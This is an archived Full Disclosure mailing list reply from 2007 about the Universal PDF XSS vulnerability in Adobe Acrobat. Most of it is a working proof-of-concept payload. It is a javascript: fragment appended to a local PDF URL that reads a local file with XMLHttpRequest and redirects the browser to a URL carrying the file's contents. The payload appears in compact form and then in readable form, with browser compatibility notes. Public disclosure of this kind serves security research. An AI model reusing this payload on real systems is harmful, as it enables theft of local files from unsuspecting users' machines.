Full Disclosure mailing list archives
Re: Universal PDF XSS After Party
From: "T Biehn" <tbiehn () gmail com>
Date: Thu, 4 Jan 2007 11:03:44 -0500
file:///C:/Program Files/Adobe/Acrobat
6.0/Resource/ENUtxt.pdf#something=javascript:function
cXHR(){try{return new ActiveXObject('Msxml2.XMLHTTP');}catch(e){}try{return
new ActiveXObject('Microsoft.XMLHTTP');}catch(e){}try{return new
XMLHttpRequest();}catch(e){} return null;}var xhr =
cXHR();xhr.onreadystatechange = function(){if (xhr.readyState == 4){alert(
xhr.responseText);window.location = "
http://localhost:80/whatever.htm?content="; +
xhr.responseText;}};xhr.open('GET',
'file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm',
true);xhr.send(null); <- sends a local file to a remote location.
Readable:
function cXHR(){ //Grabs a legit XHR.
try{
return new ActiveXObject('Msxml2.XMLHTTP');
}catch(e){}
try{
return new ActiveXObject('Microsoft.XMLHTTP');
}catch(e){}
try{
return new XMLHttpRequest();
}catch(e){}
return null;
}
var xhr = cXHR(); //For grabbing
xhr.onreadystatechange = function(){
if (xhr.readyState == 4){
alert(xhr.responseText);
window.location = "http://localhost:80/whatever.htm?content="; +
xhr.responseText;
}
};
xhr.open('GET', 'file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm',
true);
xhr.send(null);
Works in FFOX / Opera, not in IE.
On 1/4/07, pdp (architect) <pdp.gnucitizen () googlemail com> wrote:
Everybody knows about it. Everybody talks about it. We had a nice party. It is time for estimating the damages. In this article I will try to show the impact of the Universal PDF XSS vulnerability by explaining how it can be used in real life situations. http://www.gnucitizen.org/blog/universal-pdf-xss-after-party/ -- pdp (architect) | petko d. petkov http://www.gnucitizen.org _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Universal PDF XSS After Party pdp (architect) (Jan 04)
- Re: Universal PDF XSS After Party T Biehn (Jan 04)
- Re: Universal PDF XSS After Party T Biehn (Jan 04)
- Re: Universal PDF XSS After Party(posible solution) Noe Espinoza M. (Jan 04)
- Re: Universal PDF XSS After Party(posible solution) Darren Bounds (Jan 04)
- Re: [WEB SECURITY] RE: Universal PDF XSS After Party(posible solution) RSnake (Jan 04)
- Re: Universal PDF XSS After Party T Biehn (Jan 04)